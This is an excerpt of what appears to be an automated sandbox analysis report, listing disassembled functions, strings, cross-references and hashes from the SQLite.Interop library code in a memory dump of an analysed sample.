                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000239FB,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,?,6C3EAFCB,?,00000002), ref: 6C462A4B
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00023A12,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,?,6C3EAFCB,?,00000002), ref: 6C462AA9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: f5eff503a84306261e44b7d120d1c2585e5ae074ad49b165d966dd46b9e017e1
                                                                                      • Instruction ID: ecca4f1be2913d0bd3c4a67904db8e279f05589c617d47c76c2d91d2e731d890
                                                                                      • Opcode Fuzzy Hash: f5eff503a84306261e44b7d120d1c2585e5ae074ad49b165d966dd46b9e017e1
                                                                                      • Instruction Fuzzy Hash: 762127313406857BDB24DE2A8C5CE663B55AFC170AB06082EE919DBF46CFA1D5068292
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4E2200 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 74COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InitializeCriticalSection.KERNEL32 ref: 6C4E2280
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00006D47,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C4E22C7
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4E22C0
                                                                                      • misuse, xrefs: 6C4E22BB
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4E22B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalI950480ab972e108d.InitializeSection
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 3828630512-1203237178
                                                                                      • Opcode ID: 99d67a77c59609cc1b4e386af40038171330e5aaaaa33650e75803c0e7c65316
                                                                                      • Instruction ID: d8dae4f83d280f1a5b3c267ec88c176894e9477d6f71ef812a2f4070e7734aae
                                                                                      • Opcode Fuzzy Hash: 99d67a77c59609cc1b4e386af40038171330e5aaaaa33650e75803c0e7c65316
                                                                                      • Instruction Fuzzy Hash: FE21C932F4020587DA10DF589C4DE96B3B8EB8672BF12462AEC14D3B40EB70E595C6D5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4441B0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00029DE5,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C4441D1
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4441CA
                                                                                      • SQLITE_, xrefs: 6C4441E0
                                                                                      • misuse, xrefs: 6C4441C5
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4441BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$SQLITE_$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1985622057
                                                                                      • Opcode ID: fa55b4dc947c02168beeaa16cd33547e52309f0a82f080c73bee24769999a783
                                                                                      • Instruction ID: cf91f3821da7d7c83b23d25bf6833c7de73111b4ec7292d1aee21c6c4e173b41
                                                                                      • Opcode Fuzzy Hash: fa55b4dc947c02168beeaa16cd33547e52309f0a82f080c73bee24769999a783
                                                                                      • Instruction Fuzzy Hash: 6F115C73A0422457F710DD68AC84EDAB798EF813FEB15566AEC5CE7F41E361E80142D0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C446630 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,invalid), ref: 6C44665E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: API call with %s database connection pointer$bad parameter or other API misuse$invalid$out of memory
                                                                                      • API String ID: 1952225102-453588374
                                                                                      • Opcode ID: 23a4cbfb5d856638ff9c8893091d7249553a85ab6c9850d0cd699a012b450839
                                                                                      • Instruction ID: 71e5c2c88ddfa740a448c4b3003d6291bc48d2197329449bfe569e284eb17f89
                                                                                      • Opcode Fuzzy Hash: 23a4cbfb5d856638ff9c8893091d7249553a85ab6c9850d0cd699a012b450839
                                                                                      • Instruction Fuzzy Hash: 6811553134461497EA11E768AC01FDB77DACB8122EF25482DE46DD7F00EA20F82586EA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C428E40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';,?,?,?,?,?,?), ref: 6C428E59
                                                                                      • SI00f2097672333949.SQLITE.INTEROP(?,?,?,?,?), ref: 6C428E89
                                                                                      • SIdba35b6dcb77d463.SQLITE.INTEROP(?,00000000,00000000,00000000,00000000), ref: 6C428E9C
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,00000000,00000000,00000000,00000000), ref: 6C428EA4
                                                                                      Strings
                                                                                      • DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';, xrefs: 6C428E54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I00f2097672333949.I1c7a7970970b9619.Idba35b6dcb77d463.Ifc350ae509dc2b53.
                                                                                      • String ID: DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';
                                                                                      • API String ID: 1687270854-2071071404
                                                                                      • Opcode ID: 543a1ea88902124de6ed38ad7067ebffbf391e27553117d290d0a88456710098
                                                                                      • Instruction ID: 46f39d12c6fb7508a512fef87a722ddd86428db5903fcea9a2d739e5942993de
                                                                                      • Opcode Fuzzy Hash: 543a1ea88902124de6ed38ad7067ebffbf391e27553117d290d0a88456710098
                                                                                      • Instruction Fuzzy Hash: EE0188B26003046FE710D656DC82F6B73ECEB4422DF14051EF949D6F41D7A5F80486E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4240D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(ALTER TABLE %Q.'%q_node' RENAME TO "%w_node";ALTER TABLE %Q.'%q_parent' RENAME TO "%w_parent";ALTER TABLE %Q.'%q_rowid' RENAME TO "%w_rowid";,?,?,?,?,?,?,?,?,?), ref: 6C4240EF
                                                                                      • SI00f2097672333949.SQLITE.INTEROP(?,?,?,?,?), ref: 6C424118
                                                                                      • SIdba35b6dcb77d463.SQLITE.INTEROP(?,00000000,00000000,00000000,00000000), ref: 6C42412A
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,00000000,00000000,00000000,00000000), ref: 6C424132
                                                                                      Strings
                                                                                      • ALTER TABLE %Q.'%q_node' RENAME TO "%w_node";ALTER TABLE %Q.'%q_parent' RENAME TO "%w_parent";ALTER TABLE %Q.'%q_rowid' RENAME TO "%w_rowid";, xrefs: 6C4240EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I00f2097672333949.I1c7a7970970b9619.Idba35b6dcb77d463.Ifc350ae509dc2b53.
                                                                                      • String ID: ALTER TABLE %Q.'%q_node' RENAME TO "%w_node";ALTER TABLE %Q.'%q_parent' RENAME TO "%w_parent";ALTER TABLE %Q.'%q_rowid' RENAME TO "%w_rowid";
                                                                                      • API String ID: 1687270854-2843444156
                                                                                      • Opcode ID: 8a7b92d58208f6769cfb95ecaf0662f4e6c08815ec89b067ef639ca19192abe0
                                                                                      • Instruction ID: 86582168db2bc83673c10f0eb6763d8711592b3cd50306c35102452075169c7b
                                                                                      • Opcode Fuzzy Hash: 8a7b92d58208f6769cfb95ecaf0662f4e6c08815ec89b067ef639ca19192abe0
                                                                                      • Instruction Fuzzy Hash: 6D01DFB26002143FE720D65AEC05F77B7ECDB84A6AF14462DFA09D3B40E664F8048BE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C422BA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C423190: SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,00000000,?,?,00000000,?), ref: 6C4231C1
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(00000000,?,?,6C422B1F,?,?,?,?,?,?,?,00000000,?), ref: 6C422BCD
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B57CC
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014D90,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B580C
                                                                                      • SIf8364af380546f2d.SQLITE.INTEROP(00000000,00000000,?,?,?,6C422B1F,?,?,?,?,?,?,?,00000000,?), ref: 6C422BDD
                                                                                      Strings
                                                                                      • SELECT count(*) FROM %Q.'%q%s', xrefs: 6C422BB8
                                                                                      • _rowid, xrefs: 6C422BB1, 6C422BF7
                                                                                      • Wrong number of entries in %%%s table - expected %lld, actual %lld, xrefs: 6C422BF8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.$I9c6d7cd7b7d38055.If8364af380546f2d.Ifc350ae509dc2b53.
                                                                                      • String ID: SELECT count(*) FROM %Q.'%q%s'$Wrong number of entries in %%%s table - expected %lld, actual %lld$_rowid
                                                                                      • API String ID: 4064981516-791535031
                                                                                      • Opcode ID: bee5df86f5f0af35dcefd8db15909cd227db35923103c4ff3df1ac59c34cbaff
                                                                                      • Instruction ID: 42656a6e74e19456377d61233e0fda97873670e3381458de105caa3c8f92855c
                                                                                      • Opcode Fuzzy Hash: bee5df86f5f0af35dcefd8db15909cd227db35923103c4ff3df1ac59c34cbaff
                                                                                      • Instruction Fuzzy Hash: 65014EB59006003EE7219E019C83EBB36ACDB8067DF14452DF409A1B01EE75AD4543F2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3EEBD0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 50COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00023562,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,6C3F58F4), ref: 6C3EEC4A
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C3EEC43
                                                                                      • misuse, xrefs: 6C3EEC3E
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C3EEC34
                                                                                      • fts5vocab, xrefs: 6C3EEBFA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$fts5vocab$misuse
                                                                                      • API String ID: 1952225102-2411315864
                                                                                      • Opcode ID: 519889aae57409376efcf39be22b46e5eb21988c53766fac32aeb4e318891438
                                                                                      • Instruction ID: 491cd647974cb2c49a65de246c4c176b71096a6db8e3e65318984900e3130ef2
                                                                                      • Opcode Fuzzy Hash: 519889aae57409376efcf39be22b46e5eb21988c53766fac32aeb4e318891438
                                                                                      • Instruction Fuzzy Hash: 7C012171700AA013EF18E22A3C09F4B66964BC971EF06843EE41AD7F81DA20D9068AD6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C446A50 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000294A2,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,?,?,6C446B30,00000000,00000000,00000000,00000000), ref: 6C446A7A
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C446A73
                                                                                      • misuse, xrefs: 6C446A6E
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C446A64
                                                                                      • 3ZDl, xrefs: 6C446A9A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$3ZDl$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-537312483
                                                                                      • Opcode ID: ea497a7b6215055d8276fa950a9c13d4f843300aaa30eefca7016a1db2d4f183
                                                                                      • Instruction ID: e05d4ba95030ee485453373afbbf4b1d56b6512bfb1ae802d795b15bbab4bfcc
                                                                                      • Opcode Fuzzy Hash: ea497a7b6215055d8276fa950a9c13d4f843300aaa30eefca7016a1db2d4f183
                                                                                      • Instruction Fuzzy Hash: 8F01D6753407445BEA04EB69EC05DD77798EB8522AB14882EFD1DD3B01E631F41486D1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C43E8B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(illegal first argument to %s,offsets), ref: 6C43E8DA
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,000000FF,000000FF,00000001), ref: 6C43E8FD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.Ifc350ae509dc2b53.
                                                                                      • String ID: fts3cursor$illegal first argument to %s$offsets
                                                                                      • API String ID: 1339256467-1660517005
                                                                                      • Opcode ID: 7a27ddbf68b6f2c16b54b5c698542e7330b2185666c9024233f279a314b93b1c
                                                                                      • Instruction ID: 43bd47ea4d72c3f83ad394787305e7d862b8684028b8427736d59eff58233a9b
                                                                                      • Opcode Fuzzy Hash: 7a27ddbf68b6f2c16b54b5c698542e7330b2185666c9024233f279a314b93b1c
                                                                                      • Instruction Fuzzy Hash: 39F0F431A2412827CB10EE189C40DEA37959F85379F240398FC385BBD0EF619D1682D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C446AD0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002948A,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,00000000,?,?,6C445A33,00000000,000003E8), ref: 6C446AF9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$3ZDl$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-537312483
                                                                                      • Opcode ID: caa7f97f2d769d7ca4d7ad3dcc610aee6f314322c22c3ebe904921a7ebd800ab
                                                                                      • Instruction ID: 9063ea4bd7548f3b5d46db5131f45dd9cdb679b9c1ef498107e81285941ea674
                                                                                      • Opcode Fuzzy Hash: caa7f97f2d769d7ca4d7ad3dcc610aee6f314322c22c3ebe904921a7ebd800ab
                                                                                      • Instruction Fuzzy Hash: F7F0E93274466436F604F6647C02FDA278CC78076EF10842AFA0CE6B81F642A50101D5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3D6F19 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6C3D6ECA,?,?,6C3D6E6A,?,6C50DE10,0000000C,6C3D6F9D,00000000,00000000), ref: 6C3D6F39
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C3D6F4C
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,6C3D6ECA,?,?,6C3D6E6A,?,6C50DE10,0000000C,6C3D6F9D,00000000,00000000,00000001,6C3D1571), ref: 6C3D6F6F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: 56f7d83fac301c85d4205447fb55e0e17f8ae5de48082ffb8eed2cddd00f9084
                                                                                      • Instruction ID: a6437976a092b84f9a06bf38319d84ff0b3cc530da5b06eb805fdf589b9f2ab9
                                                                                      • Opcode Fuzzy Hash: 56f7d83fac301c85d4205447fb55e0e17f8ae5de48082ffb8eed2cddd00f9084
                                                                                      • Instruction Fuzzy Hash: 6AF04431A15508BBCF41DFA8CD09B9EBFB8EF09355F120199E815E6541DB319940CA95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C488B10 Relevance: 7.7, APIs: 5, Instructions: 244COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI4abff63f9a080046.SQLITE.INTEROP(?), ref: 6C488BF2
                                                                                      • SI4abff63f9a080046.SQLITE.INTEROP(?,?), ref: 6C488BFC
                                                                                      • SIea8388f7613ed158.SQLITE.INTEROP(00000000), ref: 6C488C60
                                                                                      • SIea8388f7613ed158.SQLITE.INTEROP(00000000), ref: 6C488C8B
                                                                                      • SI943321d364f02e5d.SQLITE.INTEROP(?), ref: 6C488D4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
